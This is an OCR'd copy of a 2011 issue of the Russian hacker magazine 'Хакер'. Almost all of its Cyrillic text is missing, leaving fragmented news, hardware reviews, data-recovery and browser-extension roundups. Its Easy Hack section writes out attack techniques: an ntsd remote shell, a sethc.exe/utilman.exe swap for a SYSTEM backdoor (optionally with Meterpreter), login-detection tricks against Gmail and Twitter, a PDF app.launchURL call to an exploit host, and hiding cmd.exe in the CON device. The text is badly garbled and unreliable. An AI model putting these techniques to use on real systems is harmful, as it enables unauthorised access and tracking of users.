Хакер 2011 09 PDF

x 09 (152) 2011
.
210
:

GOOGLE CHROME 030
LULZSEC
09 (152) 2011
082
LULZSEC / : , , FOX NEWS

WINDOWS 7
PHPMYADMIN
064

ANDROID 070
152
,
JAVASCRIPT 050
:
, ,
FOX NEWS
CODING
ALEKSANDR-EHKKERT@RAMBLER.RU
X 10 /141/ 10
INTRO

SMS, / -
.
3 5
.
,
: , 1,
FM, BBC

:).

, ,
. : sms

, cybercrime .
,
?
.
, ,
,
, - :
.
-
.
,

2015 ,
. ,
,
Google-hack .
nikitozz, . .
vkontakte.ru/xakep_mag
Content
MALWARE
MegaNews
004
Ferrum
016
020
021
Corpus vulgaris

PRO!
QNAP TS-459 Pro II
PC_Zone
027
028
029
030
036

,
Proof-of-Concept
SQL- 100
Live-
- Google Chrome
Google
UI- Windows 7
040
Easy-Hack
044
050
JavaScript:
,
-
Google
064
OWASP AppSec Europe 2011:

?
082
088
Pwnie Awards 2011
hacker tweets
-
phpMyAdmin

X-Tools
: RedEye, Crutop, Fethard Chronopay

LulzSec
: ?
092
098
38
102
Android-

106
Windows Phone 7.1
110
, !

114
118
-
Python
SYN/ACK
122
128
Forefront Endpoint Protection:
132
Windows
!
,

PHREAKING
136
068
076
063
wepawet
060
073 Drive-by-Download -
+5
056
Samsung S27A750D

022
070 Android-

iButton
140
143
144
FAQ UNITED
FAQ
8.5
WWW2
web-
022
070
Android-

136
iButton
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
PC_ZONE UNITS
step
(step@real.xakep.ru)
(magg@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
PHREAKING
(po@kumekay.com)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)

>PR-
(grigorieva@glc.ru)
> xakep.ru
(xa@real.xakep.ru)
/ART
>-
(alik@glc.ru)
>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906
> TECHNOLOGY
(komleva@glc.ru)
>
(olgaeml@glc.ru)
(alekhina@glc.ru)
>
(polikarpova@glc.ru)
>
, birarova@glc.ru
>
( )
(tatarenkova@glc.ru)
>
(ilk@glc.ru)
(goncharova.n@glc.ru)
>
(yakovleva.s@glc.ru)
> -
(alekseeva@glc.ru)
> MAN TV

: 8-800-200-3-999
>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
219 833 .
>

>

.

. ,
,
.

.
.

:
content@glc.ru
, , 2011
>
(kosheleva@glc.ru)
>
(lukicheva@glc.ru)
> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

MEGANEWS
Mifrill (mifrill@real.xakep.ru)
Meganews
,
. , -
, 20- .
Whisper Systems (www.whispersys.com)
( )
Android. :
-
Google.
WhisperCore -,
Nexus S (3G) Nexus One,
, . .
.
:
.
. WhisperCore,
, .
,
. , -
IMEI , ,
.
,
GPS- . SD-,
WhisperMonitor,
,
FlashBack, ,
.
6 10 Adobe Reader , ,
Avast.
,

, ,
, - .
. , ,
, GScreen.
GScreen SpaceBook 17- ,
19201080 . , . ,
: 10 ,
4,54 ! ,
. ,
. Intel Core i5560M 2,66 , 4 DDR . ,
, Intel Core i7-740QM (1,73 )
(8 ). -
004
: $2395 $2795 .
50% .
X 09 /152/ 2011
WEXLER.HOME 903

, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .

. , , ,
.
. WEXLER.HOME
750 . ,
, .
WEXLER.HOME 903 Windows 7 .

64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).
Intel Core i5-650 3,2 - 4 . CPU

Turbo Boost, (, ). , .
GeForce GTX 460,

Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.
WEXLER.HOME 903
4 , .
Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.
MEGANEWS

,
, , ,
. .
( , 12-
). , ,

,
, Malware
-,
deeonis.
, : . ,
.
, ,

, .
, .
. , ,
/Livejournal/Facebook
. ,
Deeonis - VPN!
SmartHide, , !.
, , , deeonisa
. :
, - .
Stuxnet, ,
, ,
, . ,
:).
Microsoft, .
, . ,

: ,
Apple, . , . ,
, , ,
,
:).

.
, : -
, .
, .
Microsoft $250 000

, Rustock.
... IPHONE
. , iPhone Apple ,
.

,
,

,

,

.
,
,
, .
, , -
006
, , . Photojojo
,
SLR- Canon
Nikon iPhone.
,
- Canon
Nikon.
: iPhone
3/3GS $190, iPhone 4 $249.
, . .
X 09 /152/ 2011
MEGANEWS
WEXLER.SUN
Wexler. WEXLER.SUN
, .
,
,
.
, , , MP3/MP4-, , .
,

USB- 220 .
.
(90x40x8,5 , 45 ) , .
890 .
.
47,83% ,
G Data.
(47,29%), (47,23%) (45,4%).
Microsoft. Microsoft Malware Protection Center (MMPC)

Popureb,
.
, ,
008
, Windows
.
Trojan:Win32/Popureb.E,
, - ,
, , . ,
, , , Microsoft .
,

TDL-4 ( TDL-3, Alureon
TDL). 2011
4,52 ,
. TDL-4
20 -,
ZeuS, Gbot Optima.
,
. Popureb, TDL-4 . ,
64- Windows.
, TDL
, ,
. ,
, , .
, 50%
, TDL-4 .
, TDL ,
TDL-4 . 20-200 1000 ,
.
, , (
, !).
X 09 /152/ 2011
MEGANEWS
,
, .
... , .
Food Not Bombs.

, ,
, . :
. Anonymous - .
DDoS- .
Orlando Florida Guide,
.
AntiSec
. , IRC Federal
, ,
, ,
.
, ,
. Pastebin,
SQL-. IRC Federal ,
.
. The Pirate Bay
107 , .
11 .co.cc Google - ,
.

.
,
. , -
. ,

. ,
, ,

010
. ,
2012 , ,
. -, ,
, . . ,
.
X 09 /152/ 2011
MEGANEWS
WP7 MANGO
Microsoft Mango
Windows Phone 7.
. : Mango ,
, . , Mango IE 9 HTML 5 -. ,
Skype Windows Phone 7.
Microsoft , (, Twitter Facebook),
- .
- Worldwide Developer
Conference 2011 Windows Phone 7.1 Mango. Acer,
Fujitsu, ZTE Samsung. ,
, Microsoft
, $100-150.
,
, . ,
,
, .
McAfee
- ..
8 .

Apple
, ,

Apple .
,
, .
,
Dev-Team (jailbreakme.
com, ) .
, iOS
. Apple
ASLR (Address Space Layout Randomization)
. PDF.
Apple , : ,
iOS. Dev-Team
, , PDF Patcher 2,
. ,
,
,
.

.
012
X 09 /152/ 2011
,
,

. ,

. AT&T, Verizon, Comcast,
Cablevision Time Warner Cable
, ...
, . -
(
), IP- . , , IP
.
, . ,

- . , . ,
-
, .
.
,
, Edifier.
MP250 ,

. ,

, MP250 , . ,
,
. MP250

USB- . ,
, ,
: 261 x 36
x 44 (xx), : ~0,33. ,
MP250
- .
-: 3 1,25
, 5 , - -: 4 1,25
. : RMS 2
x 2W . -: >75 (A).
: ~1 %. ,
MP250
, Reddot design award winner 2011,
IF Product design award 2011 Innovations
International CES.
2011 I
!. 5 55 ,
. . ? - I
www.petr-1.ru SMS 5206.
, -, MP4- DVD-.
, 100 .
.
X 09 /152/ 2011
15 2011 . 15 2012 .
15 2011 2 2011 . www.
petr-1.ru sms 5206. , , , , ,
SMS www.petr-1.ru
, 18 .
Samsung Galaxy S II . 55
3 . Galaxy S
85 .
MEGANEWS

,
,
, . . 13 ,
,
,
. , .
. ,
, .
, , , , . ,
,
, ,
.
IPTP Networks, RETN
.
, , , , ,
. , -, .
, - ,
- ,
. , ,
.
? - .
5,14
AMD FX-8130P 3,8 Bulldoze.
.
SAFETY AND SECURITY CENTER

Microsoft Safety and
Security Center, , , . ,
, ,
. ,

VSFTPD
014
porn streaming. ,
. Microsoft

, . ,
, .
FTP- vsftpd
,
. vsftpd-2.3.4.tar.gz .
. shell TCP- 6200,
FTP- , .
,
. ,
.
, , .
, ,
Google App
Engine.
, .
: , . - .
X 09 /152/ 2011
#GOOGLE
Android,
Chrome Google+
$9,03
28,768
>160
$6,23

+1 .
500 000

2011
,
.
$2,48

AdSense.
$2,11

(

).

Google .
Android
.
130
Android
.
Android
Market .

Google Chrome.
2,3
$20

Google+.
10
Google+
. 1,3%
Facebook.

90 eBay.
SKYPE
Skype ,
.
,
. Skype Microsoft $8,5 , , ,
. , 2009 ,
Skype, Microsoft
(Legal Intercept),
, Skype
VoIP-. ,
,
,
.
: ,
, , . ,
(POTS), VoIP , , .
.
X 09 /152/ 2011
015
FERRUM

CORPUS
VULGARIS

.
, .
,
,
.

, . : ,
.
:
, , ,
, ,
, .
. 200
.
, .

,
( ), .
. , :
.
,
.
LinX.
FurMark. , HDD
AIDA64 Extreme Edition.
20 , .
016
:
:
ASRock 890FX Deluxe3
:
AMD Phenom II 970, 3500
:
Zalman CNPS 10X Extreme
:
Corsair Dominator GT 2000 , 4
:
SAPPHIRE Radeon HD 6970
:
Western Digital WD2001FASS, 2
:
FSP Epsilon, 700
:
Windows Vista x64
X 09 /152/ 2011
4700 .
4200 .
Aerocool Xpredator
Evil Black Edition
Antec DF-35
-: mATX, ATX Flex ATX, E-ATX, XL-ATX

:
5- : 6
3,5- : 6
: 2230
:
: 4USB 2.0, 1eSATA, ,
-: Mini-ITX, mATX, ATX

:
5- : 3
3.5- : 6
: 3120 , 1140
:
: 2USB 2.0, ,
230-
, .
, . ,
.
. , PCI-
.
.
. , Aerocool Xpredator Evil Black Edition
.
- . ,
.
Antec
.
DF-35, .
,
, . Antec ,
.
- , . ,
.

. , Antec
SSD.
2,5- .
Antec DF-35 -,
.
.
. ,
. Antec DF-35 .
, , , .
, -
.
, Antec ,
.
X 09 /152/ 2011
017
FERRUM
3500 .
5700 .
Corsair 600T
GIGABYTE Cupio 6140
-: mATX, ATX
:
5- : 4
3,5- : 6
: 1120 , 2200
:
: 4USB 2.0, 1xUSB 3.0, 1IEEE1394,
,
-: mATX, ATX
:
5- : 5
3,5- : 5
: 2120
:
: 2USB 2.0, 1 eSATA, 1xFireWire, ,
Corsair
.
. ,
, . ,
, .
,
. Corsair 600T
. -- .
.
,
.
: ,
. ,
, . ,
.
, .
Corsair 600T, , ,
. ,
.
GIGABYTE.
.
.
GIGABYTE Cupio 6140 .
, , . - . , . ,
. . ,
.
, .
, , , .
.
.
USB 2.0 eSATA, FireWire, -
.
.
, , . ,
, , ,
- .
018
X 09 /152/ 2011
10000 .
5600 .
SilverStone Raven 2
Thermaltake Level 10 GT
-: mATX, ATX, SSI CEB

:
5- : 5
3,5- : 5
: 1120 , 3180
:
: 2USB 2.0, ,
-: mATX, ATX, E-ATX

:
5- : 4
3,5- : 5
: 1200 , 1140
:
: 2USB 3.0, 4xUSB 2.0, 1eSATA, ,

.
, . , .
. .
.
.
,
, - .
,
,
,
.
, , . ,
.
, .
, , ,
SilverStone Raven 2 , !
.
, .
X 09 /152/ 2011
Thermaltake Level
10 GT. ,
BMW.
.
(12,7 ). ,
.
Thermaltake Level 10 GT , . , (
, ). . ,

.
molex-. Thermaltake Level 10 GT
,
, , .
, .
Thermaltake Level 10 GT, . ,
, .
.
SilverStone Raven 2, -
, - , . z
019
FERRUM

Samsung S27A750D
:
: 27"
: 1920x1080
: TFT TN
: 300 /2
: 1000:1
: 2
: HDMI, DisplayPort,

. .
,
. 27-
?
, .

Samsung S27A750D.
, 27 .
, , , , .
Samsung S27A750D , ,
.
.

. , , , .
, Samsung S27A750D . ,
, : HDMI DisplayPort. ,
- 3D-
HDMI-.
, ColorVision Spyder 3 Elite.

: , RGB. ,
, ,
. , , .
sRGB. , ,
.
HD- . , (CCFL).
, , . , , ,
CCFL, .
, .
! . , . - , ,
2 ,
. 3D.
,
Bluetooth. , ,
. , ,
, Samsung S27A750D
3D-, 2D-,
.
, - , . :
Full HD, , ,
Samsung S27A750D.
- , , ,
.
+ 2D 3D .
- .
z
. , Samsung S27A750D . 19801080 . ,
020

X 09 /152/ 2011
FERRUM

39 000 .
PRO!

QNAP TS-459 Pro II
NAS, ,
. QNAP
, ,
.
Citius, Altius, Fortius!
NAS, , . QNAP TS-459 Pro II Intel Atom D525,

1800 . , Atom .
Hyper Threading
. 1 DDR3.
.
, QNAP TS-459 Pro II
, : 3 . ,
QNAP SATA 3.0. , , QNAP TS-459 Pro II
: , TS-459 Pro
DDR3 ( DDR2).
QNAP . ,
RJ-45,
,
Multi-IP. , QNAP TS-459 Pro II
USB eSATA.
USB 3.0,
.
X 09 /152/ 2011
, , Wi-Fi- USB-.
QNAP TS-459 Pro II
: 19 35
.
, , .
.
, ,
. , 3.4 RAID 10, RAID 0 RAID 1. RTRR (Real-time Remote Replication),

. ,
Amazon S3
ElephantDrive. ,
QNAP : www.qnap.ru.
QNAP TS-459 Pro II

, : , ,
iSCSI . z
021
PC_ZONE

,
:).
,
. .

,
, ,
. ,
, . ,
.
, . :
1. (<shift+del>) .
2. ( ).
3.

( ).
, ,
022
.
dd. , -,
sudo dd if=/dev/zero of=/
dev/sdb1 bs=512 count=1 conv=noerror (sdb1 ,
). -,

sudo dd if=/dev/zero of=/dev/sdb1
bs=512 count=1 seek=n conv=noerror
n, n 1 511968
(511968 ). ,
. 16
: 6 3 .

, . .
X 09 /152/ 2011
UFS Explorer Recovery

: Windows, Linux, BSD, Mac OS X
: NTFS, FAT, Ext2, Ext3, Ext4, XFS,
FFS, HFS, HFS+
: ( )
: 21,95 129,95
: www.ufsexplorer.com
R-Studio
: Windows
: FAT12/16/32/exFAT, NTFS, HFS/
HFS+, UFS1/UFS2, Ext2/Ext3/Ext4
: ( )
: $79 $179
: www.data-recovery-software.net
R-studio , .
.
,
, . , R-Studio -
, . ,
,
- .
R-Studio
,
RAID-.
RAID ,
. -
,
.
.
R-Studio ,
,
. .
$79,
$49 ,
FAT NTFS.
, , .
INFO
info
,
(,
Photo Recovery Genius,
DiskInternals Flash
Recovery). , ,

,
, ,
. !

.
, ,
. UFS Explorer Recovery
R-Studio: Mercedes S-,
, .

- , XFS.
? . ,
? , :
NAS
.
R.Studio, , : UFS Explorer
. , .
. UFS Explorer
Recovery
standard, professional raise data recovery.
39,95,
49,95 21,95. , professional
. standard RAID-
.vim- ( ).
( ) raise data recovery

( raise).
:
, ,
RAID .vim-, , .
: .
:
, ,
RAID, , .
: .
X 09 /152/ 2011
023
PC_ZONE
File Scavenger
: Windows
: FAT, NTFS
: ( )
: $49,95
: www.quetek.com
RecoverMyFiles
: Windows
: FAT, NTFS, HFS, HFS+
: ( )
: $69,95 $299,90
: www.recovermyfiles.com

File Scavenger
.

. , , File Scavenger. RecoverMyFiles

Windows Mac OS X,
EXT2 EXT3. ,
$69,95.
DVD
dvd

,

.
, . File Scavenger 1 , . ,
. File Scavenger
.
. :
. , .

.
RAID-.
,
.
File Scavenger $49,95.
: , RAID, ,
.
: .
: , RAID, .
: , .
024
1. ( )! .
, .
2. ,
. . .
3. , , ,
. .
, .
X 09 /152/ 2011
GetDataBack
: Windows
: FAT, NTFS
: ( )
: $69-$79
: www.runtime.org
:
GetDataBack ,
, . .
.
.
,
. , , GetDataBack
,
, .

.
NTFS FAT, $79 $69 .
EasyRecovery
: Windows
: FAT, NTFS
: ( )
: 6458 .
: www.easyrecovery.ru
EasyRecovery . , . EasyRecovery
FAT
NTFS,
. . -,
( ), -, MS Office zip-.
Raw Recovery.
EasyRecovery .
,
, .
, , ,
. ,
6 .
: ,
.
: .
: , ,
MS Office zip-.
: , .

R-Studio
UFS Explorer Recovery
EasyRecovery
File Scavenger
RecoverMyFile
GetDataBack
Stellar Phoenix
R.Saver
X 09 /152/ 2011
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
$79 $179
21.95 129.95
$230 $3300
$49.95
$69.95 $299.90
$69 $79
$49
Free
Recuva
PC INSPECTOR File Recovery
Restoration
Undelete Plus
FreeUndelete
Avira UnErase
Roadkils Undelete
Avira UnRase
+
+
+
+
+
+
+
+
+
+
+
Free
Free
Free
Free
Free
Free
Free
Free
025
PC_ZONE
Recuva
R.Saver
: Windows
: FAT, NTFS
: ( )
: www.piriform.com/recuva
: Windows
: FAT, NTFS
: ( )
: rlab.ru/tools/rsaver.html

, . , -, . Recuva
, .
. ,
, .
.

.
R.Saver ,
. , ,
UFS Explorer Recovery. , .
. R.Saver

FAT NTFS. ,
: Apple Mac OS
(HFS, HFS+/HFSX), Linux (Ext2, Ext3, Ext4, ReiserFS, JFS XFS) .. ,
RAID-
, R.Saver . .
: .
: .
: .
: .

: Windows
: FAT, NTFS
: ( )
: www.pcinspector.de
, Recuva,
. , ,
.
PC INSPECTOR Smart Recovery,
.
: .
: .
, : ?. .
R-Studio UFS Explorer Recovery. .
, . , R.Saver . , . z
026
X 09 /152/ 2011
PC_ZONE
(unconciousmind.blogspot.com)
Proof-of-Concept
SQL-
100

,
:
?.

sqlmap (sqlmap.sourceforge.net),
,

SQL- .

SQL (,
')
)
( AND 1=1)
,
.

,

DBMS,
.
,
?
98 DSSS
X 09 /152/ 2011
? ,
,
, 100 ,
, ,

.
, , . Damn Small
SQLi Scanner (DSSS), Python. ,
98 .

, (SQL poisoning),
DBMS (MySQL, Oracle, PostgreSQL,
Microsoft SQL Server ..),

.
,
, HTTP (200, 404, ..), (
Python- difflib). ,
.
Damn Small SQLi
Scanner (github.com/stamparm/DSSS),

. ,
, ,
- . z
INFO
info

DVD-.
Damn Small SQLi Scanner

SQL-
027
PC_ZONE
Step (twitter.com/stepah)
twitter.com/stepah
, Windows 7
.
: ,
,
:). ,

, (
),

. ( ),
.
. .
,
, ,

,
NTFS. .
Win7PE
. : ? ,
Win7PE, Backtrack - ?
- .

grub4dos grubinst
(download.gna.org/grubutil)
menu.lst,
ISO-.

:
YUMI (www.pendrivelinux.com);
SARDU (www.sarducd.it);
XBOOT (sites.google.com/site/shamurxboot).
GUI,

. , ,
XBOOT.
1.
.
dragndrop-
ISO,
Create
Multiboot USB/ISO.

(,
):
,
,
, ,
(Linux, Utility
..). , Offline NT Password & Registry
Editor Backtrack

. -
.
2. .

, XBOOT .
,
PE, MSDART, ERD (Windows Vista
& 7 only.). , ,
Add using
Grub4dos image Emulation.
.
3. ISO

.
(), (Syslinux, , Grub4Dos).
.
,

QEMU,
XBOOT.
, ( !)
.

-
syslinux.cfg.
4. , , .
- VMware/
QEMU/VirtualBox, ,
.
:
,
.
multibootable-

FAT32. NTFS Linux .
FAT32,

RPprepUSB tool (sites.google.com/site/
rmprepusb), 2 .
. XBOOT
.NET
Framework 4.
,
PGK.Extensions,
dll- dnpextensions.
codeplex.com
%windir%/system32.
,
,
.
.
QEMU
028
X 09 /152/ 2011
PC_ZONE
, , . ,
.
Live .
F-Secure Rescue CD
Norton Bootable Recovery Tool
Avira AntiVir Rescue System
Kaspersky Kav Rescue CD
Panda Safe Cd
AVG Rescue CD
CloneZilla

Norton
Ghost ,

.
Parted Magic/
GParted
,
,

,

.
PING (Partimage Is
Not Ghost)
LiveCD-,

,
,
,
.
SystemRescueCd

.
Ophcrack Live

LM/NTLM
Windows

.
Offline NT Password
& Registry Editor

,

- Windows
-
, .
Kon-Boot
, ,

,

Windows Linux,
.
X 09 /152/ 2011
Magic Boot Disk

MHDD

.
Trinity Rescue Kit

Windows-,
5 .
Redo Backup Live CD

,

.
YLMF

,

Live-,

Linux,
Windows
XP

Wine.
Memtest86+

,
RAM,

.
BitDefender Rescue CD
Dr.Web LiveCD
eScan Rescue Disk
GData AntiVirus Emergency System
Acronis Antimalware CD
Ubuntu Malware Removal Toolkit
netboot.me
,

,
.
NetBootCD

Linux
.
Ultimate Boot CD
100
,

.
Inquisitor Live
,

.
Dariks Boot
And Nuke
!

,
(
) .
Tails

Tor-.
029
PC_ZONE
-
Google Chrome

Google
Google Chrome,
,
. !
, ,
. ,
.
030
X 09 /152/ 2011

Fingerprinting
Wappalyzer bit.ly/oTIa1K
, -. - , -
, , ( ) .
Firefox,
, , . , ,
,
.
CMS//
, . , <meta name=generator
content=WordPress 3.1 />
, WordPress. Wappalyzer, .
Wappalyzer
, , ,
-, .
Web Server Notifier

bit.ly/nKwZm4

( ) , -,
. Apache, IIS,
Nginx, GWS, Lighttpd -
-, Web Server Notifier
.
X 09 /152/ 2011
Chrome Sniffer
bit.ly/qIVfbx
Chrome Sniffer Wappalyzer

fingerprinting

, JS.
100 .

.
Web Technology Notifier

bit.ly/nDL6yl
, -:
Ruby, PHP, ASP.NET - ? Web
Technology Notifier
fingerprinting. ,

: ,
Phusion Passenger Ruby
Zope Python.
IP Address information
bit.ly/o93jXj

WHOIS . , ,
,
IP Address information. , WHOIS,
-,
DNS, , ( )
( ,
).
HTTP Headers
bit.ly/plI977

,
HTTP (, X-Powered-By
Server).
,
HTTP Headers.
031
PC_ZONE
HTTP-
, ,
. , ,
-, HTTP-, -, -,
, , , -,
.
Request Maker bit.ly/oRVhVW
Firefox Tamper Data,

HTTP/HTTPS-, POST-.
Google
Chrome , Request Maker .
,
-, URL, ,
POST-,
. , Request Maker , ,
HTML- XMLHttpRequests,

CSS-.
HTTP Response
Browser bit.ly/
oWvHIP
,
Request Maker,

HTTP- ( XMLHttpRequest,
).

.
Advanced REST client

Application bit.ly/pXo2Yb
,
, Chrome-
(, ).
HTTP Response Browser,
HTTP-. Advanced REST client ,

JSON XML ,
HTTP- ( +
) . , ,
JSON XML-.
- , .
, ,
(--) . , Chrome, , . .
Edit This Cookie bit.ly/pLCa0N
,
. Edit This Cookie,
,
.
: ,
,
.
Read-Only-,

.
032
Swap My Cookies bit.ly/ojcXXU

. ,
Swap My Cookies. , .

, ,
.
.
X 09 /152/ 2011
Web Securify
bit.ly/rbIxuQ
, . , Websecurify,

.

Chrome.

, SQL Injection, Cross-site
Scripting, Cross-site Request Forgery,
Local/Remote File Include ..
.
Anti XSS bit.ly/o78fKn

, XSS, ,

.
, ,

.
X 09 /152/ 2011
Google Chrome ,
XSS-, SQL-, . , ,
( ).
XSS Rays bit.ly/qZwexS

, XSS, XSS , . Scan

(
). , ,
?
Reverse
, .

-.
Firebug lite for Chrome

bit.ly/ogdqzj
-, Firebug lite.
,
, - Google Chrome.
, , Firebug lite
JavaScript-,
JS-.

, ,
HTML-,
CSS .
Inspect:
, Firebug lite
, .
iMacros for Chrome

bit.ly/p6Eua9

- ,

.
,
.

, Firefox, Chrome.
033
PC_ZONE
,
. : (
, ),
, ,
.
NotScripts
bit.ly/py5Wyy
IP-
bit.ly/n2c0C3
KB SSL Enforcer
bit.ly/n1YRw2
Proxy Switchy!
bit.ly/pNtr9V
Tampermonkey
bit.ly/qXeLGm
Click&Clean
bit.ly/qlwAQP
,
NoScript Firefox,
.

, ,
XSS Clickjacking :).

.
-
. ,
:
URL
-. ,
- Pandora,
,
.
034
, , . What is
my ip adresse IP-,
, ,
.
,
Greasemonkey,
JS-,
.
Tampermonkey 90%
Chrome,
,
Greasemonkey. ,
- ,
.

userscripts.org.
,
.
SSL,

. KB SSL Enforcer ,
SSL-
, .

- ,
.
, : Flash-cookies,
LSO-
(Local Shared Objects), Silverlight,
Java. Click&Clean ,
,
. ,
.
X 09 /152/ 2011
PC_ZONE

UI-
Windows 7
+5
,
,
. ,
- ,
.
DVD
dvd

.
- , ( Windows Explorer)
, . ,
- ,
.
? , .
QTTabBar
Listary
qttabbar.wikidot.com
,
, . , , -
Microsoft. QTTabBar,
Windows Explorer,
, .
, , ,

, , .
www.listary.com
, ,
. Listary.
Findas-you-type. Windows Explorer .
,
.
?, *.
, : , , smart- ( cmd.exe ,
..).
036
X 09 /152/ 2011
TeraCopy
HashTab
www.codesector.com/teracopy.php

TeraCopy. - Total
Commander, ,
. .
,
TeraCopy. . ,
,
/ ,
.
beeblebrox.org

,

.
,
,
.
,

, HashTab.
must have!
Windows 7, ,
. , ( ),
Microsoft. , . .
Windows 7 Taskbar Items Pinner
Bins
www.door2windows.com
, , , ( exe-).
-
.
, ,

, .
www.oneupindustries.com/bins
,
.
Bin .
dragndrop-
.
,
.
X 09 /152/ 2011
037
PC_ZONE
SuperbarMonitor
Gmail Notifier Plus
superbarmonitor.de
Windows 7
.
SuperbarMonitor

, ,
.. .
bit.ly/71CVn2
Windows7

GMail ( ). ,
Inbox,
.. Jump List.
, , , . , .
, ,
. , , . .
Launchy
multibar
www.launchy.net
, ,
, .
Spotlight Mac OX,
,
. Launchy
. (
<Ctrl>+<Space>),
.
, Launchy
. <Enter>. Launchy
, , , . ,
(,
SSH- PuTTY ).
www.ticno.com

. , ,
multibar. ,
,
. - ,

.

:

multibar.

( ) .
JumpPad
http://bit.ly/pMeUBH
Mac OS X Lion
Launchpad. , JumpPad,
. ,
, ,
- . , ,
. ,

.
038
X 09 /152/ 2011
Windows 7,
. , . , .
, . ? - .
Desktops
360desktop
Fences
bit.ly/dHzGj8
, , -
.
, Microsoft
Desktops ( ,
, Windows).
Desktops
. ,

.
www.360desktop.com

,
.
, ,
,

, .
, ,
.
www.stardock.com/products/fences
,
. , ,
: ,
, , .
, . Fences
, .
,

. ,
,
. Fences
:
,
.
, , . ,
, , - .
Switcher
Acer Gridvista
bit.ly/qrSL2q
,
, drag & drop
.
, Acer. ,

, .
,
, , .
X 09 /152/ 2011
insentient.net
Switcher . ,
. ,
Mac OS X. ,
,
.
eXtra Buttons
www.xtrabuttons.com
,
(,
, )
9 ,
, ,
( ).
039

GreenDog (agrrrdog@gmail.com)
Easy Hack
1
:

WINDOWS.
:
. , ,
. :). , , :
ntsd --server tcp:port=4444 calc.exe
NTSD Microsoft NT Symbolic Debugger, , .

%Windows%\system32. ntsd
(calc.exe),
. -server ,
4444 (tcp:port=4444).
. ,
netcat , ntsd:
ntsd -remote tcp:server=192.168.138.128,port=4444
, -remote
,
4444.
:
:
SYSTEM, .
:
Windows. -
,
, . ,
,
.
. , ,
.
? .
1. LiveCD
. ,
,
%Windows%\system32\config.
2. - ,
040

.shell
! , .
, ntsd
Windows 7 2008.
MS .

Windows , , . , ntsd
.
. sethc.exe, untilman.exe. ,
? :). %Windows%\
system32, cmd.exe,
exe Meterpreter MSF, - (
).
3. .
:). <Shift> sethc.exe, . <Win+U> ( )
untilman.exe, .
4. , cmd.exe,
. . : NT AUTHORITY/SYTEM,
.
5. , meterpreter.

, .
:
100% WIN!
X 09 /152/ 2011
DVD
dvd
: ,
.
src="https://mail.google.com/mail/photos/img/photos/
public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1
ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwS
Cm_MMUDjh599IgoA2muEmEZD"
/>
:
EasyHack
, , , .
, .
, .
. , (Gmail,
Twitter, Facebook ..) ? Mike Cardwell (goo.
gl/FIO8a) . , , .
, (404,
500 ..), (200).
.
.
Gmail,
,
:
<img style="display:none;"
onload="logged_in_to_gmail()"
onerror="not_logged_in_to_gmail()"
:
, PDF.
:
.
, ,
, Chrome. ?
, ,
IE ,
,
.
, IE . ,
,
PDF- IE. PDF- :
, . , onload ,
, onerror (
). Gmail. ,
,
html-.
<script type="text/javascript" src="https://twitter.com/
account/use_phx?setting=false&format=text"
onload="not_logged_in_to_twitter()"
onerror="logged_in_to_twitter()"
async="async"
></script>
IE Opera, , onload
.
? , .
. , ,
- :).
,
PDF, PDF, Acrobat Reader,
( IE).
: bit.ly/pSuNmj. , , PDF
, ,
.
app.launchURL("http://exploit-for-ie.com/",true);
. Acrobat Reader
, .
API- URL .
.
X 09 /152/ 2011
FireFox PDF IE
041
:
HTTPS.
:
, HTTPS , (
), (
). , ,
SSL ( 3 TLS), . ,
HTTP , , HTTPS,

, .
- . , HTTPS
.
, ,
.
,
. , ,
. ,
, . ,
, , URL
. ,
, . :).
, ,
,
, .
,
: , W-Fi
Man-in-the-middle-. HTTPS, ,
. ?
, Secure
Cookie.
HTTPS.
, ,
.
1. . ,
HTTPS, , HTTPS.
, ,
:
.
:
Session_Fixation
(bit.ly/nMswUp). , ,
.

. -, ,

.
-, . ? ,
042
, Secure,
Domain
.
, . ,
.
2. . ,
-
. . ,
, 80 https- ,
443 . .
HTTP- . -,
iframe () ,
(80 ). , iframe,
.
,
21, 22, 25, 110,
(,
Firefox) .
, Secure
. ?
-, ,
. -,
-. , Apache Tomcat 6.20
Secure .
.
:
1) .
2) .
3)
,
.
4) .
5) ,
.
,
. HTTP,
HTTPS.
WebGoat OWASP (bit.ly/jeqeOF). -
.
X 09 /152/ 2011
:
WINDOWS.
:
, :). , .
? , .
,
.
DOS , ,
(, ,
, :). backward
capability Windows. ,
CON, AUX, COMx, NUL, PRN, LPTx, CLOCKx ( x
1 9). , , .
, , .
/ .
. ,
:
Copy file.txt \\.\c:\CON
,
. file.txt.
CON . , .
Copy \\.\c:\CON file.txt
,
exe. , CON cmd.exe:
X 09 /152/ 2011
copy c:\windows\system32\cmd.exe \\.\c:\CON
,
CON-cmd.exe:
wmic process call create \\.\c:\CON
, Windows XP 7.
- ,
. ,
. z
043

iv (ivinside.blogspot.com)
pikofarad (115612, . , .1)
, !
,
. ,
. -
, , , ,
,
. ,
.
01
MS Office 2010 RTF Header Stack

Overflow Vulnerability Exploit
CVSS V2 BASE SCORE:
9.3 (HIGH)
(AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
: 3 2011
: Snake
CVE: CVE-2010-3333
Microsoft Office XP SP3, Office 2003 SP3,
Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac
2011 and Open XML File Format Converter for Mac ,
RTF-.
( ), , Ikazuchi DEP/ASRL Bypass,
DEP/ASLR.
EXPLOIT
